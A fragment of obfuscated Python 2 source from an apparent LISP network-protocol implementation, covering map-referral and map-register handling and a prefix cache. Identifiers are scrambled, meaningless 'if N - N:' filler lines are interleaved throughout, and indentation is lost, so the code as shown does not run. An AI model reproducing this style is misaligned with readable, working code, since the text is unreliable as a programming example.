if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
for IiIIi1IiiIiI in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
packet = I1Ii11iI . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 73 - 73: i11iIiiIii - Oo0Ooo
I1Ii11iI . print_record ( " " )
if 100 - 100: iIii1I11I1II1 + I1Ii111
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
oo0o00OO = I1Ii11iI . rloc . print_address ( )
if ( oo0oooo00OOO . referral_set . has_key ( oo0o00OO ) == False ) :
iiI111I = lisp_referral_node ( )
iiI111I . referral_address . copy_address ( I1Ii11iI . rloc )
oo0oooo00OOO . referral_set [ oo0o00OO ] = iiI111I
if ( IiII1iiI == oo0o00OO and oOo000oOoO ) : iiI111I . updown = False
else :
iiI111I = oo0oooo00OOO . referral_set [ oo0o00OO ]
if ( oOo0OooOoooO . has_key ( oo0o00OO ) ) : oOo0OooOoooO . pop ( oo0o00OO )
if 81 - 81: I1IiiI
iiI111I . priority = I1Ii11iI . priority
iiI111I . weight = I1Ii11iI . weight
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
for Oo000O000 in oOo0OooOoooO : oo0oooo00OOO . referral_set . pop ( Oo000O000 )
if 20 - 20: IiII - OOooOOo + OoOoOO00
I11i11i1 = oo0oooo00OOO . print_eid_tuple ( )
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
if ( iI1I11II ) :
if ( i111iII . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( I11i11i1 , False ) ) )
if 74 - 74: OoO0O00
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( I11i11i1 , False ) , i111iII . rloc_count ) )
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( I11i11i1 , False ) , i111iII . rloc_count ) )
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if ( I11I1iI == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets , oo0oooo00OOO . eid ,
oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr , I1I1iiii111II . sport , 15 , None , False )
I1I1iiii111II . dequeue_map_request ( )
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if ( I11I1iI == LISP_DDT_ACTION_NOT_AUTH ) :
if ( I1I1iiii111II . tried_root ) :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets , oo0oooo00OOO . eid ,
oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr , I1I1iiii111II . sport , 0 , None , False )
I1I1iiii111II . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( I1I1iiii111II , True )
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
if ( I11I1iI == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( oo0oooo00OOO . referral_set . has_key ( IiII1iiI ) ) :
iiI111I = oo0oooo00OOO . referral_set [ IiII1iiI ]
iiI111I . updown = False
if 40 - 40: iII111i * I11i
if ( len ( oo0oooo00OOO . referral_set ) == 0 ) :
I1I1iiii111II . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( I1I1iiii111II , False )
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 87 - 87: OoOoOO00
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if ( I11I1iI in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( I1I1iiii111II . eid . is_exact_match ( i111iII . eid ) ) :
if ( not I1I1iiii111II . tried_root ) :
lisp_send_ddt_map_request ( I1I1iiii111II , True )
else :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets ,
oo0oooo00OOO . eid , oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr ,
I1I1iiii111II . sport , 15 , None , False )
I1I1iiii111II . dequeue_map_request ( )
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
else :
lisp_send_ddt_map_request ( I1I1iiii111II , False )
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if 87 - 87: I11i
if 39 - 39: I1ii11iIi11i * i11iIiiIii % I1Ii111
if ( I11I1iI == LISP_DDT_ACTION_MS_ACK ) : I1I1iiii111II . dequeue_map_request ( )
if 72 - 72: OoO0O00 * Oo0Ooo - IiII
return
if 74 - 74: Ii1I
if 26 - 26: I11i . O0
if 68 - 68: Ii1I
if 26 - 26: o0oOOo0O0Ooo - I1ii11iIi11i / O0 % i11iIiiIii
if 7 - 7: I1Ii111 . Oo0Ooo + IiII / iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 - O0 . iII111i - IiII - ooOoO0o
if 54 - 54: OoO0O00 . iII111i . OoOoOO00 * OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
I1iiiIII11ii1i1i1 = lisp_ecm ( 0 )
packet = I1iiiIII11ii1i1i1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 9 - 9: o0oOOo0O0Ooo
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
I1iiiIII11ii1i1i1 . print_ecm ( )
if 21 - 21: Ii1I * OoOoOO00
O0ooOoO0 = lisp_control_header ( )
if ( O0ooOoO0 . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 29 - 29: iIii1I11I1II1 / ooOoO0o
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
oO0ooooooOo = O0ooOoO0 . type
del ( O0ooOoO0 )
if 18 - 18: I11i
if ( oO0ooooooOo != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 95 - 95: I1IiiI / OoooooooOO
if 29 - 29: OoOoOO00
if 100 - 100: o0oOOo0O0Ooo - I1IiiI / I11i
if 43 - 43: o0oOOo0O0Ooo % iIii1I11I1II1
if 85 - 85: oO0o + OoooooooOO - IiII % o0oOOo0O0Ooo * ooOoO0o * II111iiii
I1iIi1I1I11iI = I1iiiIII11ii1i1i1 . udp_sport
oooooo0ooo0O = time . time ( )
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
I1iiiIII11ii1i1i1 . source , I1iIi1I1I11iI , I1iiiIII11ii1i1i1 . ddt , - 1 , oooooo0ooo0O )
return
if 27 - 27: i1IIi + I1IiiI . i1IIi
if 81 - 81: Ii1I * IiII / OoO0O00 . iII111i % I11i . ooOoO0o
if 63 - 63: Oo0Ooo * I1Ii111 % Ii1I
if 88 - 88: IiII - i1IIi * OoO0O00 * OoOoOO00 % I1IiiI
if 10 - 10: OOooOOo * I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
if 96 - 96: O0
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
oo0OoO = ms . map_server
if ( lisp_decent_push_configured and oo0OoO . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
oo0OoO = copy . deepcopy ( oo0OoO )
oo0OoO . address = 0x7f000001
I11i1iIiiIiIi = bold ( "Bootstrap" , False )
i11ii = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( I11i1iIiiIiIi , i11ii ) )
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 8 - 8: oO0o * iII111i * I11i
if 30 - 30: I1Ii111
if 61 - 61: iII111i
if 50 - 50: Ii1I / I1IiiI . O0
if 49 - 49: I1Ii111 . OoO0O00 % O0
if ( ms . ekey != None ) :
II11iI11i1 = ms . ekey . zfill ( 32 )
iiI1iiIiiiI1I = "0" * 8
o0 = chacha . ChaCha ( II11iI11i1 , iiI1iiIiiiI1I ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + o0
oOo = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( oOo , ms . ekey_id ) )
if 15 - 15: I11i - Oo0Ooo / I1Ii111 . ooOoO0o % I1IiiI
if 62 - 62: II111iiii + ooOoO0o + I1IiiI
OOo00OO = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
OOo00OO = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 76 - 76: ooOoO0o % O0 . I1ii11iIi11i
if 97 - 97: oO0o - Oo0Ooo . i11iIiiIii % ooOoO0o * i11iIiiIii - OoooooooOO
lprint ( "Send Map-Register to map-server {}{}{}" . format ( oo0OoO . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , OOo00OO ) )
if 44 - 44: I11i % OoooooooOO / iII111i - i11iIiiIii * i1IIi * o0oOOo0O0Ooo
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , packet )
return
if 51 - 51: Ii1I + IiII / I1ii11iIi11i + O0 % Ii1I
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
if 18 - 18: OoooooooOO - I1ii11iIi11i
if 94 - 94: OOooOOo . Oo0Ooo + Ii1I * o0oOOo0O0Ooo
if 79 - 79: OOooOOo + Oo0Ooo
if 33 - 33: iIii1I11I1II1
if 75 - 75: I1Ii111 / iIii1I11I1II1 . OoooooooOO
if 98 - 98: iIii1I11I1II1 / I1IiiI + i1IIi
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
i1IIi1ii1i1ii = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 80 - 80: II111iiii . Oo0Ooo * oO0o % II111iiii / I1ii11iIi11i
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
packet = lisp_control_packet_ipc ( packet , i1IIi1ii1i1ii , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
if 56 - 56: Oo0Ooo % I1ii11iIi11i
if 53 - 53: OoO0O00 . I11i - ooOoO0o
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if 39 - 39: i1IIi
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
if 59 - 59: i1IIi
if 37 - 37: OoO0O00 / I1ii11iIi11i / OoOoOO00
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 2 - 2: Ii1I . IiII % OoOoOO00
if 42 - 42: OoOoOO00 * OoO0O00 * IiII - IiII % Oo0Ooo . IiII
if 38 - 38: I1Ii111 . IiII - ooOoO0o . i11iIiiIii
if 35 - 35: i11iIiiIii
if 62 - 62: O0 - o0oOOo0O0Ooo + I1Ii111 * I1ii11iIi11i / OOooOOo
if 87 - 87: Oo0Ooo / OoooooooOO + O0 / o0oOOo0O0Ooo % II111iiii - O0
if 63 - 63: OOooOOo - OoO0O00 * i1IIi - I1ii11iIi11i . I1IiiI
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 59 - 59: i11iIiiIii . OOooOOo % Oo0Ooo + O0
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 84 - 84: I1Ii111 / O0 - IiII . I11i / o0oOOo0O0Ooo
if 12 - 12: i11iIiiIii / Ii1I + i1IIi
if 54 - 54: I1IiiI
if 55 - 55: I1ii11iIi11i % IiII % o0oOOo0O0Ooo + i1IIi * OoooooooOO % II111iiii
if 37 - 37: Oo0Ooo
if 33 - 33: OoooooooOO - O0 . O0 - o0oOOo0O0Ooo % o0oOOo0O0Ooo % OoO0O00
if ( lisp_nat_traversal ) :
oo0O = lisp_get_any_translated_port ( )
if ( oo0O != None ) : inner_sport = oo0O
if 27 - 27: ooOoO0o . i11iIiiIii / o0oOOo0O0Ooo * OoO0O00 * OoOoOO00 * oO0o
I1iiiIII11ii1i1i1 = lisp_ecm ( inner_sport )
if 19 - 19: O0 * II111iiii * OoOoOO00
I1iiiIII11ii1i1i1 . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
I1iiiIII11ii1i1i1 . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
I1iiiIII11ii1i1i1 . ddt = ddt
ooo000 = I1iiiIII11ii1i1i1 . encode ( packet , inner_source , inner_dest )
if ( ooo000 == None ) :
lprint ( "Could not encode ECM message" )
return
if 40 - 40: oO0o
I1iiiIII11ii1i1i1 . print_ecm ( )
if 31 - 31: Oo0Ooo * iIii1I11I1II1 * Ii1I * Ii1I
packet = ooo000 + packet
if 23 - 23: oO0o + OoO0O00 * O0
oo0o00OO = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( oo0o00OO ) )
oo0OoO = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , packet )
return
if 99 - 99: oO0o * IiII * oO0o
if 70 - 70: IiII + iII111i / I1ii11iIi11i
if 97 - 97: I1IiiI * OoOoOO00 / iII111i * i11iIiiIii
if 20 - 20: Ii1I . I11i % iII111i * iIii1I11I1II1 . OoO0O00 . Ii1I
if 50 - 50: I1IiiI % OOooOOo / iIii1I11I1II1 / I1ii11iIi11i % oO0o . Ii1I
if 14 - 14: oO0o / Ii1I - I1Ii111
if 79 - 79: I1Ii111
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 54 - 54: II111iiii
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 98 - 98: Ii1I - i11iIiiIii
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
if 81 - 81: I1ii11iIi11i - i11iIiiIii
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 60 - 60: i11iIiiIii + IiII
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
def byte_swap_64 ( address ) :
IiiIIi1 = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if 48 - 48: iII111i + Ii1I
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
return ( IiiIIi1 )
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
if 48 - 48: ooOoO0o + II111iiii
if 73 - 73: II111iiii
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
if 66 - 66: o0oOOo0O0Ooo % IiII
class lisp_cache_entries ( ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 39 - 39: IiII
if 18 - 18: iII111i % o0oOOo0O0Ooo - i1IIi
if 53 - 53: o0oOOo0O0Ooo + IiII - ooOoO0o % i11iIiiIii - i11iIiiIii - I1Ii111
class lisp_cache ( ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 79 - 79: II111iiii + i11iIiiIii . OOooOOo . I11i / iIii1I11I1II1
if 62 - 62: O0
def cache_size ( self ) :
return ( self . cache_count )
if 52 - 52: OoooooooOO . oO0o
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
OOoOOO = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
OOoOOO = prefix . mask_len
else :
OOoOOO = prefix . mask_len + 48
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
if 59 - 59: Ii1I
o0OoO0000o = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
O0ooo0 = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 77 - 77: I1ii11iIi11i * Ii1I * O0 * I1IiiI % OoO0O00 - iIii1I11I1II1
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
IiiI1iii1iIiiI = prefix . addr_length ( ) * 2
IiiIIi1 = lisp_hex_string ( prefix . address ) . zfill ( IiiI1iii1iIiiI )
else :
IiiIIi1 = prefix . address
if 6 - 6: i11iIiiIii . I11i - OoooooooOO
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
O0ooo0 = "8003"
IiiIIi1 = prefix . address . print_geo ( )
else :
O0ooo0 = ""
IiiIIi1 = ""
if 26 - 26: I1IiiI
if 26 - 26: IiII . Ii1I / IiII - OoO0O00 % OoO0O00
Oo000O000 = o0OoO0000o + O0ooo0 + IiiIIi1
return ( [ OOoOOO , Oo000O000 ] )
if 72 - 72: OoooooooOO * II111iiii + OoO0O00 % iIii1I11I1II1 . I1ii11iIi11i % OoooooooOO
if 19 - 19: OoOoOO00 + I1Ii111
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
OOoOOO , Oo000O000 = self . build_key ( prefix )
if ( self . cache . has_key ( OOoOOO ) == False ) :
self . cache [ OOoOOO ] = lisp_cache_entries ( )
self . cache [ OOoOOO ] . entries = { }
self . cache [ OOoOOO ] . entries_sorted = [ ]
self . cache_sorted = sorted ( self . cache )
if 19 - 19: I1ii11iIi11i / I1Ii111 + OoooooooOO - O0
if ( self . cache [ OOoOOO ] . entries . has_key ( Oo000O000 ) == False ) :
self . cache_count += 1
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
self . cache [ OOoOOO ] . entries [ Oo000O000 ] = entry
self . cache [ OOoOOO ] . entries_sorted = sorted ( self . cache [ OOoOOO ] . entries )
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
def lookup_cache ( self , prefix , exact ) :
Oo0o , Oo000O000 = self . build_key ( prefix )
if ( exact ) :
if ( self . cache . has_key ( Oo0o ) == False ) : return ( None )
if ( self . cache [ Oo0o ] . entries . has_key ( Oo000O000 ) == False ) : return ( None )
return ( self . cache [ Oo0o ] . entries [ Oo000O000 ] )
if 80 - 80: I1IiiI % Ii1I
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
ooOoOO0o = None
for OOoOOO in self . cache_sorted :
if ( Oo0o < OOoOOO ) : return ( ooOoOO0o )
for i1OO0OO0oO0o000 in self . cache [ OOoOOO ] . entries_sorted :
Oo0O0Oo0oo = self . cache [ OOoOOO ] . entries
if ( i1OO0OO0oO0o000 in Oo0O0Oo0oo ) :
i1ii1i1Ii11 = Oo0O0Oo0oo [ i1OO0OO0oO0o000 ]
if ( i1ii1i1Ii11 == None ) : continue
if ( prefix . is_more_specific ( i1ii1i1Ii11 . eid ) ) : ooOoOO0o = i1ii1i1Ii11
if 92 - 92: i1IIi
if 3 - 3: iIii1I11I1II1 . I1ii11iIi11i
if 97 - 97: O0
return ( ooOoOO0o )
if 82 - 82: OoooooooOO / I1Ii111 - ooOoO0o . I1Ii111
if 41 - 41: I11i . I11i
def delete_cache ( self , prefix ) :
OOoOOO , Oo000O000 = self . build_key ( prefix )
if ( self . cache . has_key ( OOoOOO ) == False ) : return
if ( self . cache [ OOoOOO ] . entries . has_key ( Oo000O000 ) == False ) : return
self . cache [ OOoOOO ] . entries . pop ( Oo000O000 )
self . cache [ OOoOOO ] . entries_sorted . remove ( Oo000O000 )
self . cache_count -= 1
if 12 - 12: OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
def walk_cache ( self , function , parms ) :
for OOoOOO in self . cache_sorted :
for Oo000O000 in self . cache [ OOoOOO ] . entries_sorted :
i1ii1i1Ii11 = self . cache [ OOoOOO ] . entries [ Oo000O000 ]
I111I1iiIi1 , parms = function ( i1ii1i1Ii11 , parms )
if ( I111I1iiIi1 == False ) : return ( parms )
if 71 - 71: Ii1I + OOooOOo + i1IIi
if 72 - 72: OoooooooOO - IiII . O0 + OoooooooOO + I11i
return ( parms )
if 11 - 11: OoOoOO00 + ooOoO0o
if 56 - 56: OoooooooOO - IiII + IiII
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 33 - 33: I1ii11iIi11i * i11iIiiIii
for OOoOOO in self . cache_sorted :
for Oo000O000 in self . cache [ OOoOOO ] . entries_sorted :
i1ii1i1Ii11 = self . cache [ OOoOOO ] . entries [ Oo000O000 ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( OOoOOO , Oo000O000 ,
i1ii1i1Ii11 ) )
if 62 - 62: oO0o + I11i . OOooOOo . OoO0O00
if 94 - 94: oO0o - o0oOOo0O0Ooo / I1ii11iIi11i . IiII - II111iiii - ooOoO0o
if 92 - 92: OoooooooOO + O0 * OOooOOo
if 1 - 1: O0
if 34 - 34: o0oOOo0O0Ooo * i1IIi + I1Ii111
if 46 - 46: IiII / i11iIiiIii
if 51 - 51: OoO0O00 - OoO0O00 + o0oOOo0O0Ooo * iII111i % II111iiii
if 7 - 7: O0 * OoO0O00 % IiII
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 76 - 76: iII111i - i1IIi
if 62 - 62: Ii1I + O0 % I1IiiI
if 44 - 44: i11iIiiIii
if 21 - 21: OOooOOo
if 15 - 15: I1ii11iIi11i + oO0o
if 99 - 99: oO0o - ooOoO0o - II111iiii * OoooooooOO / O0
if 57 - 57: iIii1I11I1II1 / IiII + OoO0O00 * oO0o + Ii1I
def lisp_map_cache_lookup ( source , dest ) :
if 76 - 76: i11iIiiIii . OOooOOo / I11i * oO0o % iIii1I11I1II1 . ooOoO0o
o0oO0O00 = dest . is_multicast_address ( )
if 75 - 75: O0 + I1IiiI
if 67 - 67: OoOoOO00 % OoooooooOO / OoO0O00 - OoO0O00 / O0
if 19 - 19: iIii1I11I1II1 / OOooOOo % I11i % I1IiiI / I1ii11iIi11i
if 73 - 73: II111iiii
o0o000Oo = lisp_map_cache . lookup_cache ( dest , False )
if ( o0o000Oo == None ) :
I11i11i1 = source . print_sg ( dest ) if o0oO0O00 else dest . print_address ( )
I11i11i1 = green ( I11i11i1 , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( I11i11i1 ) )
return ( None )
if 26 - 26: II111iiii . iIii1I11I1II1 - I1Ii111 % OOooOOo
if 83 - 83: OOooOOo + OoooooooOO % I1Ii111 % IiII + i11iIiiIii
if 10 - 10: OoooooooOO . Ii1I % I1Ii111 + IiII
